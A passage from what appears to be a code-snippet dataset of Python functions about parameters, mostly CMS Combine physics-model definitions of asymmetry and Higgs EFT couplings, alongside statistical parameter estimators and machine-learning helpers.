self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def get_interp_param(self, key, params, epoch_idx):\n self.debug.start_function('get_interp_param')\n self.debug.variable('interp key', key, formatter='')\n key = self.mcmc_version.param_aliases.get(key, key)\n\n if key in self.mcmc_version.epoch_unique:\n key = f'{key}{epoch_idx + 1}'\n\n self.debug.variable('param key', key, formatter='')\n self.debug.end_function()\n return params[self.param_idxs[key]]", "def getParameter(self, *args):\n return _libsbml.KineticLaw_getParameter(self, *args)", "def get_p_sample(self):\n control = self.p_control * self.n_control\n treatment = self.p_treatment * self.n_treatment\n sample = self.n_control + self.n_treatment\n\n p_sample = (control + treatment) / sample\n\n self.p_sample = p_sample\n\n return p_sample", "def estimateParameterValues(self, name, rawData):\n mean = np.nanmean(np.ravel(rawData))\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return cint(mean-2*std, mean+2*std, 200)\n elif name == self.parameterNames[1]:\n return oint(0, 2 * std, 200)\n else:\n raise ConfigurationError('Gaussian model does not contain a parameter \"{}\".'.format(name))", "def estimateParameterValues(self, name, rawData):\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return oint(0, 2 * std, 1000)\n else:\n raise ConfigurationError('White noise model does not contain a parameter \"{}\".'.format(name))", "def update_parameter(self):\n\n if self.testing: # 1. No random choice when testing\n self.epsilon = 0\n else: # 2. Update parameters when learning\n if self.epsilon > 0.:\n self.epsilon -= 0.01\n\n return self.epsilon", "def get_parameters(self):\n # Get the parameters from the parent class\n params = super(NREvalSplit, self).get_parameters()\n\n # Add the LP specific parameters\n params.update({\"samp_frac\": self._samp_frac})\n return params", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"mAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"mA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doSet(\"POI\",\"eAfb,mAfb\")\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def get_bounds(self, parameter_name=None):\n if parameter_name is None:\n return [self.get_bounds(p) for p in self.shape_parameters.keys()]\n if parameter_name in self.shape_parameters:\n anchor_settings = list(self.shape_parameters[parameter_name][0].keys())\n return min(anchor_settings), max(anchor_settings)\n elif parameter_name.endswith('_rate_multiplier'):\n for source_name, allow_negative in zip(self.source_name_list,self.source_allowed_negative):\n if parameter_name.startswith(source_name) and allow_negative==True:\n return float('-inf'), float('inf')\n return 0, float('inf')\n else:\n raise InvalidParameter(\"Non-existing parameter %s\" % parameter_name)", "def __getitem__(self, index) -> torch.nn.Parameter:\n return self.parameters[index]", "def likelihood_adjustment(self) -> 'outputs.PreventionInspectTemplateInspectConfigRuleSetRuleHotwordRuleLikelihoodAdjustment':\n return pulumi.get(self, \"likelihood_adjustment\")", "def _get_interpolation(self) :\n \n return self._interpolation", "def get_parameters(self):\n if self.add_bias:\n params = np.concatenate((self.bias, self.W), 0)\n else:\n params = self.W\n return params", "def eff_param_string():\n return '[0] * (1 - [1] * (TMath::Erf(x[0] + [2]) - [1] / [4] * (x[0] - [3] * (pow(x[0], 2) - [3] / [5] * pow(x[0], 3)))))'", "def doParametersOfInterest(self):\n self.modelBuilder.doVar(\"mu[1,0,100]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doSet(\"POI\",\"mu\")\n self.modelBuilder.factory_('expr::ggH_s_func(\"@0-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::ggH_b_func(\"1-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::ggH_sbi_func(\"sqrt(@0)\", mu)')", "def _get_new_param(self):\n new_param = sympy.symbols(\"p\"+str(len(self.learning_params)))\n self.learning_params.append(new_param)\n return new_param", "def prior_sample_parameter(self, parameter):\n pass", "def getUpdatedVar(self):\n axisList = self.tabWidget.currentWidget()\n kwargs = self.generateKwArgs()\n updatedVar = axisList.getVar()(**kwargs)\n\n # Get the variable after carrying out the: def, sum, avg... operations\n updatedVar = axisList.execAxesOperations(updatedVar)\n\n return updatedVar", "def read_parameter(self, path, default=None, attr=None):\n try:\n if path.startswith('sample'):\n entry = self.entry.nxroot['entry']\n else:\n entry = self.entry\n if attr:\n return entry[path].attrs[attr]\n elif isinstance(entry[path], NXgroup):\n return entry[path]\n else:\n return entry[path].nxvalue\n except NeXusError:\n return default", "def scaling_adjustment(self):\n return self._scaling_adjustment", "def get_extension_param(self):\n if 'frame' in self.disp_parameters['extension']:\n exten = 'all'\n elif 'cube' in self.disp_parameters['extension']:\n exten = 'all'\n elif 'first' in self.disp_parameters['extension']:\n exten = 0\n else:\n try:\n exten = int(self.disp_parameters['extension'])\n except ValueError:\n exten = str(self.disp_parameters['extension']).strip()\n return exten", "def extend_param(self):\n return self._extend_param", "def getInputSpecification(cls):\n inputSpecification = super(Exponential, cls).getInputSpecification()\n inputSpecification.addSub(InputData.parameterInputFactory(\"low\", contentType=InputTypes.FloatType))\n inputSpecification.addSub(InputData.parameterInputFactory(\"lambda\", contentType=InputTypes.FloatType))\n\n return inputSpecification", "def getCalibration(self):\n self.a0 = float(self.getParameter(index=1))\n self.a1 = float(self.getParameter(index=2))\n self.a2 = float(self.getParameter(index=3))\n self.a3 = float(self.getParameter(index=4))\n status = self.getStatus()\n self.wavelength = [ self.a0 + self.a1*x + self.a2*x*x + self.a3*x*x*x \n for x in range(status.pixels)]\n if self.discardTrailingSamples > 0:\n self.wavelength = self.wavelength[:-self.discardTrailingSamples]\n if self.discardLeadingSamples > 0:\n self.wavelength = self.wavelength[self.discardLeadingSamples:]", "def argument_value(self, idx: int):\n return self._values[idx][0]", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.70,0.70]\");\n self.modelBuilder.doSet(\"POI\",\"Afb\")\n\n # ss templates\n self.modelBuilder.doVar(\"Rdy_mumu_ss[1.0,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rdy_ee_ss[1.0,0.0,10.0]\");\n \n self.modelBuilder.factory_('expr::Rpl(\"(1.+@0)\",Afb)')\n self.modelBuilder.factory_('expr::Rmn(\"(1.-@0)\",Afb)')", "def _get_geometric_augmentation_parameter(self, entry: SupervisedKeypointDBEntry) -> (float, float):\n # Not training\n if not self._is_train:\n return 1.0, 0.0\n\n # For scale\n scale = np.clip(np.random.randn(), -1.0, 1.0) * self._config.aug_scale_factor + 1.0\n\n # For rotate:\n if random.random() < self._config.aug_rot_rate and (not entry.on_boundary):\n rotate_rad = np.clip(np.random.randn(), -2.0, 2.0) * self._config.aug_rot_rad_factor\n else:\n rotate_rad = 0.0\n\n # OK\n return scale, rotate_rad", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.7,0.7]\");\n self.modelBuilder.doVar(\"A0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doSet(\"POI\",\"Afb,A0\")\n\n # ss templates\n self.modelBuilder.doVar(\"R_ee_os_fakes[0.6,0.0,1.0]\");\n self.modelBuilder.doVar(\"ee16_fakes_norm[1.0, 0.01, 10.]\");\n self.modelBuilder.doVar(\"ee17_fakes_norm[1.0, 0.01, 10.]\");\n self.modelBuilder.doVar(\"ee18_fakes_norm[1.0, 0.01, 10.]\");\n #Remember, cant use spaces in these formulas!\n #self.modelBuilder.options.verbose = 10\n self.modelBuilder.factory_('expr::R_ee16_qcd_os(\"@0*@1\",ee16_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee17_qcd_os(\"@0*@1\",ee17_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee18_qcd_os(\"@0*@1\",ee18_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee16_qcd_ss(\"@0*(1.0-@1)\",ee16_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee17_qcd_ss(\"@0*(1.0-@1)\",ee17_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee18_qcd_ss(\"@0*(1.0-@1)\",ee18_fakes_norm,R_ee_os_fakes)')\n \n self.modelBuilder.factory_('expr::Alph(\"2.0*@0/(2.0-@0)\",A0)')\n self.modelBuilder.factory_('expr::Norm(\"3.0/4.0/(2.0+@0)\",Alph)')\n self.modelBuilder.factory_('expr::RAlph(\"@0*@1\",Alph,Norm)')\n self.modelBuilder.factory_('expr::Rpl(\"(@0+@1)\",Norm,Afb)')\n self.modelBuilder.factory_('expr::Rmn(\"(@0-@1)\",Norm,Afb)')", "def getEnergyExpended(self, sample):\r\n if sample is not None:\r\n if len(sample._data) > self.ENERGY_EXPENDED_INDEX:\r\n ee = sample._data[self.ENERGY_EXPENDED_INDEX]\r\n if ee is not None:\r\n return int(ee)\r\n return -1", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"A0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doSet(\"POI\",\"Afb,A0\")\n\n \n self.modelBuilder.factory_('expr::Alph(\"2.0*@0/(2.0-@0)\",A0)')\n self.modelBuilder.factory_('expr::Norm(\"3.0/4.0/(2.0+@0)\",Alph)')\n self.modelBuilder.factory_('expr::RAlph(\"@0*@1\",Alph,Norm)')\n self.modelBuilder.factory_('expr::Rpl(\"(@0+@1)\",Norm,Afb)')\n self.modelBuilder.factory_('expr::Rmn(\"(@0-@1)\",Norm,Afb)')", "def p(self):\n return hlp.parms(self.y(0))", "def var(self):\n\n return self.rate", "def x_rate(self):\n values = self._interpolate_table(\"x\", derivative_order=1)\n # values += self._corrections(('ortho_eop', iers.ortho_eop, 0, 1e-6),\n # ('pmsdnut2', iers.pmsdnut2, 0, 1e-6))\n return values", "def estimateParameterValues(self, name, rawData):\n if name == self.parameterNames[0]:\n # lower is boundary is zero by definition, upper boundary is chosen as 1.25*(largest observation)\n return oint(0, 1.25*np.nanmax(np.ravel(rawData)), 1000)\n else:\n raise ConfigurationError('Poisson model does not contain a parameter \"{}\".'.format(name))", "def parameters(self):\n temp = list(_flatten(self.params))\n temp_val = [self.check_domain(x.val, True) if isinstance(x, Variable) else x for x in temp]\n return _unflatten(temp_val, self.params)[0]", "def doParametersOfInterest(self):\n self.modelBuilder.doVar(\"mu[0,0,1000]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doSet(\"POI\",\"mu\")\n self.modelBuilder.factory_('expr::vbfH_s_func(\"@0-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::vbfH_b_func(\"1-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::vbfH_sbi_func(\"sqrt(@0)\", mu)')", "def estimateParameterValues(self, name, rawData):\n\n if name == self.parameterNames[0]:\n # The parameter of the Bernoulli model is naturally constrained to the [0, 1] interval\n return cint(0, 1, 1000)\n else:\n raise ConfigurationError('Bernoulli model does not contain a parameter \"{}\".'.format(name))", "def replace_parameterized_exchanges(self,sample):\n\n parameters_subsample = sample[self.i_sample : self.i_sample+len(self.parameters_array)]\n self.i_sample += len(self.parameters_array)\n\n # Convert uniform [0,1] sample to proper parameters distributions\n converted_parameters = self.convert_sample_to_proper_distribution(self.parameters_array,parameters_subsample)\n\n new_parameters = {}\n\n # Put converted values to parameters class, order of converted_parameters is the same as in parameters_array\n for i in range(len(self.parameters_array)):\n name = self.parameters_array[i]['name']\n new_parameters[name] = converted_parameters[i]\n\n # Update parameterized exchanges with the new converted values of parameters\n self.update_parameterized_exchanges(new_parameters)\n\n # Replace values in self.amounts_tech and self.amounts_bio\n np.put(self.amount_tech, self.parameters_dict['tech_params_where'], self.parameters_dict['tech_params_amounts'])\n np.put(self.amount_bio, self.parameters_dict['bio_params_where'], self.parameters_dict['bio_params_amounts'])", "def position_p_gain(self):\n return self._read(MX_POSITION_P_GAIN)", "def get_positional_valuation(self, features):\n\n\t\tfeatures = features.reshape(1, -1) \n\t\tmodel_val = self.model.predict_proba(features)[0][1]\n\n\t\treturn model_val", "def getModtranExtinction(self):\n if not self.modtran_wl:\n self.initModtranWavelengths()\n\n modtranDataDir = os.getenv('MODTRAN_DATADIR')\n # MODTRAN transmission outputfile\n outputfile = '{0}/{1}.plt'.format(self.outfilename, self.outfilename)\n outputpath = os.path.join(modtranDataDir, outputfile)\n # Initialize array for transmittance\n trans = numpy.zeros(len(self.modtran_wl))\n with open(outputpath, 'r') as outf:\n # File starts with data - no header\n # I use negative indices because MODTRAN prints the wavelengths\n # in decreasing order\n idx = -1\n for line in outf:\n if line.starstwith('$'):\n continue\n values = line.strip().split()\n trans[idx] = float(values[1])\n idx -= 1\n if abs(idx) > len(self.modtran_wl):\n raise ValueError(\"Too many values to unpack from MODTRAN \\\n outputfile.\")\n return trans\n # MODTRAN transmittance stored", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale,self.period))", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale,self.period))", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale,self.period))", "def get_custom_param(plot):\n return Plot.get_custom_param(plot)", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rbk[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd_emu[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rbk,Rdy,Rqcd_emu\")", "def doParametersOfInterest(self):\n \n self.modelBuilder.doVar('expr::cosW(\"0.87681811112\",)')\n self.modelBuilder.doVar('expr::sinW(\"0.48082221247\",)')\n self.modelBuilder.doVar('expr::mZ(\"91.2\",)')\n self.modelBuilder.doVar('expr::Lambda1(\"100.0\",)')\n self.modelBuilder.doVar('expr::e2(\"0.0917\",)')\n self.modelBuilder.doVar('expr::gs2(\"1.533\",)')\n\n # EFT Higgs basis couplings\n\n self.modelBuilder.doVar('cZ[0,-1,1]') \n self.modelBuilder.doVar(\"cZZ[0,-2,2]\") \n self.modelBuilder.doVar(\"cZZt[0,-2,2]\") \n self.modelBuilder.doVar(\"cZB[0,-6,6]\") \n\n poi='cZ,cZZ,cZZt,cZB'\n\n # Amplitude couplings from EFT couplings \n\n self.modelBuilder.doVar('expr::a1(\"@0+1\",cZ)') # (\"2*(@0+1)\",cZ) in AN/Paper but a1 = 1 for signal model and width calculation\n self.modelBuilder.doVar('expr::a2(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZ,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::a3(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZt,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::k1(\"@0*(@1*pow(@2,2)/(pow(@3,2)*pow(@4,2)))\",cZB,e2,Lambda1,sinW,mZ)')\n self.modelBuilder.doVar('expr::k1L1(\"@0/pow(@1,2)\",k1,Lambda1)')\n\n ###### gamma_H ########\n\n # SMEFT relationships for VV couplings (Expressed using amplitude couplings)\n\n self.modelBuilder.doVar('expr::kappa(\"1.0\",)')\n self.modelBuilder.doVar('expr::kappa_tilde(\"0.0\",)') \n\n self.modelBuilder.doVar('expr::a1_WW(\"@0\",a1)')\n self.modelBuilder.doVar('expr::a2_WW(\"@0*@0*@1\",cosW,a2)')\n self.modelBuilder.doVar('expr::a3_WW(\"@0*@0*@1\",cosW,a3)')\n self.modelBuilder.doVar('expr::k1_WW(\"(@2 / (@0*@0 - @1*@1) - 2*@1*@1*@3*@4*@4 /(@5*@5*(@0*@0 - @1*@1)))\",cosW,sinW,k1,a2,Lambda1,mZ)')\n self.modelBuilder.doVar('expr::k2_k1(\"2*@0*@1*@2/(@0*@0 - @1*@1)\",cosW,sinW,k1)')\n self.modelBuilder.doVar('expr::k2_a2(\"-2*@0*@1*@3*@4*@4/((@2*@2)*(@0*@0 - @1*@1))\",cosW,sinW,mZ,a2,Lambda1)')\n self.modelBuilder.doVar('expr::k2(\"@0 + @1\",k2_k1,k2_a2)')\n\n # Determine gamma_H from VV couplings\n\n zz_expr = '\"4*(@0*@0/4. + 0.1695*@3*@3 + 0.09076*@1*@1 + 0.03809*@2*@2 + 0.8095*@0*@3/2. + 0.5046*@0*@1/2. + 0.2092*@1*@3 + 0.1023*@4*@4 + 0.1901*@0*@4/2. + 0.07429*@3*@4 + 0.04710*@1*@4) \",a1,a2,a3,k1,k2'\n ww_expr = '\"4*(@0*@0/4. + 0.1320*@3*@3 + 0.1944*@1*@1 + 0.08075*@2*@2 + 0.7204*@0*@3/2. + 0.7437*@0*@1/2. + 0.2774*@3*@1) \",a1_WW,a2_WW,a3_WW,k1_WW'\n zgamma_expr = '\"4*(1.118600*@0*@0/4. +0.0035*@1*@1 - 0.125010*@0*@1/2. + 0.000003*@1*@1 - 0.00018*@1*@1 + 0.003100*@0*@1/2. +0.00126*@2*@2 + 0.000005*@2*@2 -0.00047*@2*@2)\",a1_WW,kappa,kappa_tilde'\n gg_expr = '\"(1.1068*@0*@0 + 0.0082*@0*@0 - 0.1150*@0*@0 + 2.5717*@1*@1 + 0.0091*@1*@1 - 0.1982*@1*@1)\",kappa,kappa_tilde'\n bb_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n cc_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n tautau_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n mumu_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n gmgm_expr = '\"4*(1.6054*@0*@0/4. + 0.07312*@1*@1 - 0.6854*@0*@1/2. + 0.00002*@1*@1 - 0.0018*@1*@1 + 0.0085*@0*@1/2. + 0.1699*@2*@2 + 0.00002*@2*@2 - 0.0031*@2*@2)\",a1_WW,kappa,kappa_tilde'\n \n self.modelBuilder.doVar('expr::R_WW('+str(ww_expr)+')')\n self.modelBuilder.doVar('expr::R_ZZ('+str(zz_expr)+')')\n self.modelBuilder.doVar('expr::R_Zgamma('+str(zgamma_expr)+')')\n self.modelBuilder.doVar('expr::R_gg('+str(gg_expr)+')')\n self.modelBuilder.doVar('expr::R_bb('+str(bb_expr)+')')\n self.modelBuilder.doVar('expr::R_cc('+str(cc_expr)+')')\n self.modelBuilder.doVar('expr::R_tautau('+str(tautau_expr)+')')\n self.modelBuilder.doVar('expr::R_mumu('+str(mumu_expr)+')')\n self.modelBuilder.doVar('expr:R_gammagamma('+str(gmgm_expr)+')')\n\n self.modelBuilder.doVar('expr::gammaH(\"(0.5824*@0 + 0.2137*@1 + 0.08187*@2 + 0.06272*@3 + 0.02891*@4 + 0.02619*@5 + 0.002270*@6 + 0.001533*@7 + 0.0002176*@8 )/0.9998\",R_bb,R_WW,R_gg,R_tautau,R_cc,R_ZZ,R_gammagamma,R_Zgamma,R_mumu)') \n\n ###########################\n\n self.g1V = GetCoupTerms(1,1,1,-0.0001,\"1V\") # Compensate for scaling of k1 templates \n self.g2V = GetCoupTerms(1,1,1,-0.0001,\"2V\") \n \n self.modelBuilder.doVar(\"expr::g2V_1(\\\"\"+str(self.g2V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1(\\\"((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1_Neg(\\\"-1*((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.doVar(\"expr::g2V_2(\\\"\"+str(self.g2V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2(\\\"((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2_Neg(\\\"-1*((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.doVar(\"expr::g2V_3(\\\"\"+str(self.g2V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3(\\\"((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3_Neg(\\\"-1*((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.doVar(\"expr::g2V_4(\\\"\"+str(self.g2V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4(\\\"((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4_Neg(\\\"-1*((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.doVar(\"expr::g2V_5(\\\"\"+str(self.g2V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5(\\\"((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5_Neg(\\\"-1*((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.doVar(\"expr::g2V_6(\\\"\"+str(self.g2V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6(\\\"((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6_Neg(\\\"-1*((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.doVar(\"expr::g2V_7(\\\"\"+str(self.g2V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7(\\\"((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7_Neg(\\\"-1*((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.doVar(\"expr::g2V_8(\\\"\"+str(self.g2V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8(\\\"((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8_Neg(\\\"-1*((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.doVar(\"expr::g2V_9(\\\"\"+str(self.g2V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9(\\\"((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9_Neg(\\\"-1*((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.doVar(\"expr::g2V_10(\\\"\"+str(self.g2V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10(\\\"((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10_Neg(\\\"-1*((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.doVar(\"expr::g2V_11(\\\"\"+str(self.g2V[10])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11(\\\"((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11_Neg(\\\"-1*((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.doVar(\"expr::g2V_12(\\\"\"+str(self.g2V[11])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12(\\\"((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12_Neg(\\\"-1*((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.doVar(\"expr::g2V_13(\\\"\"+str(self.g2V[12])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13(\\\"((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13_Neg(\\\"-1*((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.doVar(\"expr::g2V_14(\\\"\"+str(self.g2V[13])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14(\\\"((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14_Neg(\\\"-1*((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.doVar(\"expr::g2V_15(\\\"\"+str(self.g2V[14])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15(\\\"((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15_Neg(\\\"-1*((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.doVar(\"expr::g2V_16(\\\"\"+str(self.g2V[15])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16(\\\"((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16_Neg(\\\"-1*((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.doVar(\"expr::g2V_17(\\\"\"+str(self.g2V[16])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17(\\\"((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17_Neg(\\\"-1*((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.doVar(\"expr::g2V_18(\\\"\"+str(self.g2V[17])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18(\\\"((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18_Neg(\\\"-1*((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.doVar(\"expr::g2V_19(\\\"\"+str(self.g2V[18])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19(\\\"((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19_Neg(\\\"-1*((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.doVar(\"expr::g2V_20(\\\"\"+str(self.g2V[19])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20(\\\"((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, 